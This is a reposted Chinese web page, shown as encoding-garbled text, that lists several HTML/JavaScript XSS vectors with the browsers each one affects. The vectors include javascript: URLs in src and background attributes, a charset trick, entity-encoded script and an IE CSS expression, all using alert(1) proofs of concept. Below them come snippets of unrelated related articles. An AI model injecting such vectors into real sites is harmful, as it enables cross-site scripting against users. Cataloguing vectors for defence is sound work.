Ò׽ؽØÍ¼Èí¼þ¡¢µ¥Îļþ¡¢Ãâ°²×°¡¢´¿ÂÌÉ«¡¢½ö160KB

HTML °²È«Áбí

ÏÂÃæÕâ¸öÍøÕ¾ÂÞÁÐÁË£¬¼¸ºõËùÓеĹØÓÚHTML 5 ÔÚ¸÷ÖÖÖ÷Á÷ä¯ÀÀÆ÷ÉϵݲȫÎÊÌ⣬ÕâЩ°²È«ÎÊÌâºÜÓпÉÄܽ«»áÊǺڿ͹¥»÷ÄãµÄÍøÉϵÄÇÃÃÅש£¬ËûÃǼ¸ºõ¶¼ºÍJavascript¶¼ÓйØÏµ£¬Äã¾ÍÒªºÃºÃ×¢ÒâÁË¡£
http://heideri.ch/jso/
ÏÂÃæÂÞÁм¸¸ö£º
1£©<table background=”javascript:alert(1)”>
IE6£¬7£¬8£¬9£¬ºÍOpera 8.x, 9.x, 10.x ¶¼Ö§³ÖÕâÑùµÄÓï·¨¡£
2£©<meta charset=”mac-farsi”>¼script¾alert(1)¼/script¾
Õâ¸öÎÊÌâ»á´æÔÚÓÚËùÓеÄFirefox°æ±¾ÖУ¬¿ÉÒÔÈÃÓû§½øÐÐXSS£¨¿çÕ¾½Å±¾£©¹¥»÷
3£©<script>&amp;#x61;l&amp;#x65;rt&amp;#40;1)</script>
ÔÚ<script>ºÍ<style>µÄTAG¼ä£¬¸ù¾Ý±ê¾Ý£¬Æä¿ÉÒÔʹÓÃÕâÑùµÄ×Ö·ûÀ´ÔËÐнű¾¡£ÕâÔÚËùÓа汾µÄFirefox, Opera, ºÍ ChromeÖж¼»áÓÐÎÊÌâ¡£
 
4£©({set/**/$($){_/**/setter=$,_=1}}).$=alert
ÉÏÃæÕâ¸öÊÇFirefoxµÄÒ»¸öÓï·¨£¬Ò²»á²úÉúXSS¹¥»÷¡£
5£©<div style=”font-family:foo}x=expression(write(1));”>XXX</div>
×Ô´ÓIE5.5ºó£¬Ö±µ½IE9£¬IE¾Í¿ÉÒÔÖ§³ÖÉÏÃæÕâÑùµÄÓï·¨¡£
6£©srcÖÐÊÇ¿ÉÒÔÔËÐнű¾µÄ£¬È磺
<embed src=”javascript:alert(1)”>
<img src=”javascript:alert(1)”>
<image src=”javascript:alert(1)”>
<script src=”javascript:alert(1)”>
ÓÖÒ»¸öXSS¹¥»÷£¬¼¸ºõËùÓеÄä¯ÀÀÆ÷¶¼Ö§³ÖÕâÑùµÄ·½Ê½£¬È磺FirefoxÈ«²¿°æ±¾£¬Chrome 4.x/5.x£¬Opera 8.x/9.x/10.0£¬IE 6.0/7.0ºÍSafari 3.x/4.x
 
»¹Óкܶ࣬´ó¼Ò×Ô¼ºÈ¥¿´°É£¬Õâ¸öÍøÕ¾¾­³£¸üеġ£×ÜÌå¸Ð¾õÏÂÀ´£¬IEºÍFirefoxµÄ°²È«ÎÊÌâ¶¼ÔÚ²®ÖÙÖ®¼ä£¬SafariÃ²ËÆÊÇÎÊÌâ×îÉٵġ£
 
ת×Ô- ¿á¿ÇÍø(http://coolshell.cn/?p=2416)


Ïà¹ØÎĵµ£º

htmlÌØÊâ×Ö·ûת»»£¨java£©

/**
* °ÑÎı¾±àÂëΪHtml´úÂë
* @param target
* @return ±àÂëºóµÄ×Ö·û´®
*/
public static String htmEncode(String target)
{
StringBuffer stringbuffer = new StringBuffer();
int j = target.length();
for (int i = 0; i < j; i++)
......

Web¿ª·¢ µÚÒ»²¿·Ö HTML½Ì³Ì»ù´¡£¨Ê®Èý£©±í¸ñ²¼¾Ö

Ç°ÃæµÄ¿Î³ÌÖУ¬ÎÒÃÇѧϰÁ˱í¸ñÔªËØ£¬ÉϽڿÎÖУ¬ÎÒÃÇͨ¹ýÒ»±¾±í¸ñÀ´¶Ô±íµ¥ÄÚµÄ×é¼þ½øÐÐλÖõĿØÖÆ£¬ÕâÆäʵ¾ÍÊÇÒ»ÖÖ¼òµ¥µÄ±í¸ñ²¼¾Ö¡£Õâ½Ú¿Î£¬ÎÒÃÇÏêϸÀ´ÌÖÂÛÒ»ÏÂʹÓñí¸ñµÄ²¼¾Ö·½·¨¡£
¿´ÈçÏ´úÂ룺
index.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml ......

HTML noscript ±êÇ©

HTML <noscript> ±êÇ©
¶¨ÒåºÍÓ÷¨
noscript ÔªËØÓÃÀ´¶¨ÒåÔڽű¾Î´±»Ö´ÐÐʱµÄÌæ´úÄÚÈÝ£¨Îı¾£©¡£
´Ë±êÇ©¿É±»ÓÃÓÚ¿Éʶ±ð <script> ±êÇ©µ«ÎÞ·¨Ö§³ÖÆäÖеĽű¾µÄä¯ÀÀÆ÷¡£
HTML Óë XHTML Ö®¼äµÄ²îÒì
NONE
ÌáʾºÍ×¢ÊÍ£º
×¢ÊÍ£ºÈç¹ûä¯ÀÀÆ÷Ö§³Ö½Å±¾£¬ÄÇôËü²»»áÏÔʾ³ö noscript ÔªËØÖеÄÎı¾¡£
×¢ÊÍ£ºÎÞ·¨Ê¶±ð ......

HTML label ±êÇ©


HTML <label> ±êÇ©
¶¨ÒåºÍÓ÷¨
<label> ±êǩΪ input ÔªËØ¶¨Òå±ê×¢£¨±ê¼Ç£©¡£
label ÔªËØ²»»áÏòÓû§³ÊÏÖÈκÎÌØÊâЧ¹û¡£²»¹ý£¬ËüΪÊó±êÓû§¸Ä½øÁË¿ÉÓÃÐÔ¡£Èç¹ûÄúÔÚ label ÔªËØÄÚµã»÷Îı¾£¬¾Í»á´¥·¢´Ë¿Ø¼þ¡£¾ÍÊÇ˵£¬µ±Óû§Ñ¡Ôñ¸Ã±êǩʱ£¬ä¯ÀÀÆ÷¾Í»á×Ô¶¯½«½¹µãתµ½ºÍ±êÇ©Ïà¹ØµÄ±íµ¥¿Ø¼þÉÏ¡£
<label> ± ......
© 2009 ej38.com All Rights Reserved. ¹ØÓÚE½¡ÍøÁªÏµÎÒÃÇ | Õ¾µãµØÍ¼ | ¸ÓICP±¸09004571ºÅ